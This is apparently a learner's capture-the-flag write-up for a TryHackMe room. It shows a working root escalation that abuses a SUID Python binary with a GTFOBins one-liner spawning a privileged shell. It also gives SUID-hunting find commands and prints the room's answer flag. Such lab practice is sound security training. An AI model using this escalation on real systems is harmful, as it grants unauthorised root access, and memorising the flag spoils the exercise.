Lab 42 – Manual privilege escalation using python

Lab 42 – Manual privilege escalation using python - 101Labs.net101Labs.net

Lab Objective:

Learn how to manually escalate privileges from a shell using python.

Lab Purpose:

Privilege escalation occurs when a user exploits a bug, misconfiguration, or design flaw in an application or operating system to gain access to resources that should normally be unavailable to that user.

Lab Tool:

Kali Linux

Lab Topology:

You can use Kali Linux in a VM for this lab.

Solving

This lab is the next episode of the previous Lab 41, which we managed to set up a reverse shell to the webserver already.

This lab objective is to escalate our access to root privilege access.

And this lab is basically the tasks from Task 4 of TryHackMe room:

RootMeTryHackMe

Let's finish this lab/room !

1.) Find the SUID permission files.

find . -type f -perm -u=s 2>/dev/null

Since this lab we'll be playing with python, then the file ./usr/bin/python seems interesting to us.

2.) Let's check that out.

I did cd to the file and used the file command to check to file:

file python

The SetUID file is often used as a "do as another user" file. The meaning of "do as another user" is like:

"Imagine you're an ordinary human in your city. Your city contains many people. But there is one king, who build the whole city himself. The king, has all access to any of the resources in the city. Of courses !, He made the city himself.

But the king has that one badge, a Golden badge. Any of the people who has this badge on their shirt, That human gets all the access in the city, like a king.

But once the badge is not on the shirt anymore, that human will come back to his/her original access." To compare to our case - The king: root - Us: user - Resources: files/directories - The badge: SetUID file/"do as another user" file

To be realistic with our lab and real world, the SetUID is not always giving you the root privilege, It gives access depends on how it was written. i.e. user1 using do-as-user2 will give user1 access like user2 access. So to be concluded:

The level of access or privileges you gain by executing a setuid file depends on how the file is written and what operations it performs.

3.) Now let's do some reseach about python & privilege escalation

I found this site:

python | GTFOBins

Looks interesting, because right now we're dealing with SetUID file, and it says that to interact with our existing SUID, we can skip the first line.

So, the one we'll be using in this case is:

./usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
#or if you're in the python SUID file directory already you can use:
.python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

After pressed ENTER, nothing happened.

But I found out that I can still type. So, I tried whoami command to check my user right now:

whoami

ROOT !

After a long time since Lab 41, everyone. I've done it. This is my first time doing a privilege escalation in my life. :)

Enough of the emo !

This is the end of Lab 42 – Manual privilege escalation using python provided by CompTIA Security+ of 101labs.net

But once again, We'll be going to finish our TryHackMe room.

We still have a flag to capture.

Once again, I'll try going with find command. But before that, I'll cd to the first directory (/). In order to find from all of the directories. And when I'm in / directory already:

find -type f -name root.txt

Right there we found it.

And we captured our flag.

THM{pr1v1l3g3_3sc4l4t10n}

The room is completed.